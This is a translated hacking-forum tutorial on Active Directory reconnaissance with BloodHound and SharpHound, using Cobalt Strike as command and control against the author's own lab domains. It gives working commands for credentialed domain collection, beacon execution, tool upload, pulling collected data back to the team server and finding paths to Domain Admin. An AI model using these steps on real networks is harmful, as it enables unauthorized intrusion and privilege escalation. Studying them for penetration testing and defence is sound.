- 14 Tem 2024
- 392
- 10
- 355
hi THT members, today we will learn how to install, use BloodHound in our Active Directory
enumeration step and for C2 (Command and Control) we will use Cobalt Strike.
This thread is translated version of the following thread:
BloodHound ile Active Directory hakkında bilgi toplama II (Cobalt Strike C2)
The goal of the BloodHound tool is provide to the attacker with an easier and faster ways for conducting
Domain Enumeration step in different internal infrastructure pentest based on Active Directory environments.
In complex environments, using BloodHound can be helpful because attacking the AD network is not only about
exploiting CVE vulnerabilities in the network environment, but also exploiting different misconfigurations that
can open more paths for lateral movement, and BloodHound will help us find these misconfigurations
and collect a full Active Directory network environment map.
BloodHound - SharpHound
The BloodHound tool can assists for attackers in step mapping and visualizing the Active Directory
network environment. In complex and large network environments, it helps to detect misconfigurations in
GPOs, Trusts, ACLs, ADCS, Delegations...etc., which allows for attackers to make further lateral movement
and privilege escalation steps. BloodHound uses LDAP (Lightweight Directory Access Protocol)
or SMB (Server Message Block) based protocols for Domain Discovery.
BloodHound's role is to visualize data graphically. Neo4j (graph database) is a database
that stores information and processes it. BloodHound uses a graph shell called
Neo4j (graph database), and it uses the Cypher language. BloodHound's graph shell
displays the collected data in graphs.
using Neo4j console
vs
using GUI mode
There are 3 different ways to collect information from the target system:
- Using BloodHound.py (python ingestor) is a python script for collecting Active Directory data, and can be run from your
Linux machine, but in order to run it you need the credentials of the target computer, such as user and password.
Kod:
python3 bloodhound.py -u <UserName> -p <Password> -ns <Domain Controller's IP> -d <Domain> -c All- Using SharpHound.exe (C#, EXE ingestor) collects information about Active Directory objects and prepares data to
be uploaded to the database, it must be run on a Windows-based computer in the Active Directory network.
be uploaded to the database, it must be run on a Windows-based computer in the Active Directory network.
Kod:
Collects all available data:
> SharpHound.exe -c All
Collects all available data by authenticating with a username and password for specific target:
> SharpHound.exe -c All -d <Domain> -u <UserName> -p password <Password>
specify the name of the result ZIP file:
> SharpHound.exe -zipfilename C:\path\to\output.zip- Using SharpHound.ps1 (PowerShell module) Other than using the sharphound exe, we can also use the powershell
module (Invoke-BloodHound). In this method we will first import the sharphound.ps1 powershell module with the
Import-Module .\SharpHound.ps1 command, then we can start collecting information with following commands like:
Kod:
> Import-Module .\SharpHound.ps1
> Invoke-BloodHound -CollectionMethod All
> Invoke-BloodHound -CollectionMethod ACLWhat kind of information does SharpHound collect by default ?
After running SharpHound in Active Directory network environment, it will collect information about: Users,
Computers, Objects in the Domain, Domain Controller, Domain Trusts, Groups and Memberships, Misconfigurations
related to Delegations, ACL,GPO,..etc., GPO, OU, SQL admin links, members of the Local Administrators group,..etc.
Once after running one of the BloodHound data collectors (in our case SharpHound), SharpHound will generate
JSON files and place them in a zip file. We can extract the zip files and upload these JSON files to the BloodHound GUI
and then we will be able to see the data that SharpHound has collected about the Active Directory Domain Environment.
Cobalt Strike C2 (Command and Control)
Cobalt Strike is a framework which is aimed to help in conducting red team operations. CS has different
types of options and functions, and each of them has its own purpose. For instance: Listeners: Create listeners
such as DNS, SMB, TCP, Pivoting, upload or download files to the target, configure process injection, loaders and
other bypassing related configurations using Malleable, etc. Malleable C2 profiles - will control Beacon's
in-memory properties, determining how Beacon handles process injection, DLL loading, and other
Cobalt Strike's post-exploitation tactics. You can read a more detailed guide here: Cobalt Strike Manual
Today we targeted the information gathering step with Cobalt Strike, because Cobalt Striek provides different options
for network scanning and we can use .net, powershell commands for Domain Discovery, and we can also use Cobalt Strike
as C2 (Command and Control) to install SharpHound on the target computer and conduct information gathering step with
BloodHound. For the Domain Enumeration step I created a simple Active Directory network environment with 2 Domains and a Forest.
Kod:
./teamserver <ip_address> <password> [<malleableC2profile> <kill_date>]We go the folder cobaltstrike/client and then we can start the client:
Kod:
./cobaltstrikethen the Connect Dialog (“Connection Dialog Screen”) will be displayed.
In our case we will use standard configurations:
Alias - Specify an alias for the host computer or use the standard name.
Host (Computer) - specify the IP address of your team server.
Port - specify the port number. by default it shows Port (50050) for the team server.
User - your username on the team server.
Password - type the shared password for the team server.
After clicking Connect, we enter into the GUI of Cobalt Strike:
Now in order to start Domain Enumeration we need targets which are connected into Active Directory
Network Environment. For instance in our Active Directory Environment which we built previously, such access
can be obtained using different kind of techniques like: uploading webshell in IIS, we can exploit services,
we can exploit misconfigurations,..etc. After access has been obtained in internal network we can run
information gathering commands in Cobalt Strike and start Sharphound on the target computer.
Firstly for Domain Enumeration step we needed some target computers, I gathered users and spawned
sessions for users whose credentials I knew such as user and password (they were obtained from previous test)
For better understanding, I opened a new graph and added creds step by step and spawned sessions so
that our CS graph appears in Tree form:
As you can see from the new graphic, the users are no longer connected to each other, because instead of
lateral movement we aim at the information gathering step. And we don't need connected computers,
we just need to enter the Active Directory network environment. So we actually need a small number of
users to run Sharphound. The red computers in the graph are Administrators. When you spawn the session as
Administrator it will be shown as red. The blue computers are just users.
using cobalt strike beacon> console we can use commands like net view, net users, but here we
have a few things which we need to follow as Cobalt Strike mentioned.
for example, in order to run .net commands we need to type the word shell: net users --> shell net users.
I list some necessary commands that should be run near .net and powershell commands:
for running cmd.exe | .net:
shell - to run a command through cmd.exe on the target computer.
run - to run a command without using cmd.exe.
for running powershell.exe:
powershell - to run a command with PowerShell on the target computer.
powerpick - Run PowerShell cmdlets without using powershell.exe.
This command depends on the Unmanaged PowerShell technique.
and another command is:
execute - runs a program in the background and does not record output.
SharpHound:
Now let's upload SharpHound into one of the target computers. We have different options to upload
sharphound.exe to the target computer using Cobalt Strike Command and Control.
Basically we do it using the File Browser [Upload], this is a very easy method, but additionally we have
other ways for uploading process. For example: using powershell
Invoke-WebRequest, bitsadmin, ..etc.[Beacon: cersei.lannister] --> [right-click] --> Explore --> File Browser
Download sharphound from here
https://github.com/SpecterOps/SharpHoundAfter downloading sharphound, we can now upload the exe file to the target computer.
Upload --> SharpHound.exe --> Open
! Actually it is not recommended to upload it in the Desktop folder,
you can use any other folder, but we used Desktop as an example.
Kod:
> upload [path/to/file/for/uploading] [path\to\file\in\target]In the beacon console it shows that this method uses the upload command and it
runs successfully and uploads to the target computer. Let's see, when we go to the
C:\Users\administrators\Desktop directory, we can find the sharphound.exe file:
SharpHound: Cross-Domain Collection
Command for collecting default informations:
Kod:
.\SharpHound.exe
SharpHound.exe -c AllFirst of all, as I mentioned above, our Active Directory network environment contains two domains
and we need to add a few additional flags to collect data from other domains in the same Forest.
In Forest we have the following two domains:
sevenkingdoms.local and north.sevenkingdoms.localThe Active Directory network environment which I built looks like this:
Cross-Domain Collection - means collecting information for different domains in the same forest.
The method of cross-domain information collection depends on the trusts between domains.
In powershell we can run the following commands as an example:
Kod:
.\SharpHound.exe -c All --domain <domain>
.\SharpHound.exe -c All --domain sevenkingdoms.localFor example, being as a user at
north.sevenkingdoms.local, we will move to the sevenkingdoms.local domain for Domain Discovery.It is also possible to collect cross-domain information using LDAP authentication.
Kod:
.\SharpHound.exe -c All --domain <domain> --ldapusername <user> --ldappassword <password>After running sharphound, we download the zip file to our computer.
In Cobalt Strike we can use the download command for easy “exfiltration”.
Kod:
> download [path\to\file\for\downloading]
We will now upload the file from Cobalt Strike to our computer.
On Cobalt Strike in order to see the files your team server has downloaded,
we go to View --> Downloads
Downloaded files are stored on the team server.
Press the Sync button to bring the files to your system.
Cobalt Strike will then download the selected files to the specific folder on your system.
We will upload these JSON files to the BloodHound to see the Active Directory network environment graphically.
BloodHoundWe start with BloodHound installation.
Make sure to install java, it is pre-installed in kali.
Kod:
sudo apt-get install bloodhound
Bloodhound is powered by a graphical database called Neo4j.
Now we go into the neo4j console and do some configuration like changing the password.
After running the neo4j console it gives us the url address, we open
http://localhost:7474 in our browser.
Kod:
neo4j console
Here we need to change the default password for neo4j. standard password and username is neo4j:neo4j.
First we will register neo4j:neo4j --> Connect. Then we will set a new password.
After typing the new password, click on --> “Change password”.
now that we've launched neoj4. After that we can start Bloodhound.
We go to the terminal and type Bloodhound.
Kod:
bloodhoundThen automatically opens bloodhound page. as user we enter neoj4 and the password our new password which we set before.
Now after entering the bloodhound GUI, you will see an empty graph.
We will upload the JSON files which we downloaded from Cobalt Strike.
There are different ways to upload data to bloodhound, we can drag and drop files, or we can use the “Upload Data” button.
select all JSON files and import them into the bloodhound GUI.
Upload Data --> .json --> Open
Additionally, we can see the Upload status using the “View Upload Status” button. “View Upload Status”
In the Database Info tab, we can see the information of Users, Computers, Groups, GPO, OU, ...etc.
After loading all the JSON files we can see the graph with the objects.
Following image visualize the Domain Admins. Users included in the Domain Admins group.
When we click on the user “cersei.lannister” and click on the Node Info button,
on the left side of the screen, there will be displayed different information about the user.
for instance, List all Kerberoastable Accounts (it will show targets which are Kerberoatable service accounts
or we can say users which can be attacked using Kerberoasting attack technique), Shortest Paths to Domain Admins,..etc.
For example, we select “Shortest Paths to Domain Admin”.
As you can see in the picture, you can see which users and what kind of misconfigurations
we can use in order to access the Domain Admin user.
Misconfigurations like WriteDacl, GenericAll permissions give easy compromising step
for targeting the Domain Admin user. Of course there are other different ways to access
Domain Admins, but it all depends on the target network environment.
To mark an object as Owned we can [right-click] on the object [e.g. user: cersei.lannister] in the GUI --> “Mark User as Owned” .
There are other options, for example: Set as Starting Node (Initial Access, the first user which we
entered to the network), Shortest Path to Here (Which users we need to attack in order to access this user), etc.
After clicking on the “Mark User as Owned” button, this will place a “skull” icon on their object
and in the future it will allow us to make additional queries based on owned objects.
Kod:
List all owned objects
MATCH (n) WHERE “owned” in n.system_tags RETURN nThis command can be placed in the Cypher query panel, we can click on search and see all owned objects.
You can get a detailed guide about cyphers here: Searching with Cypher
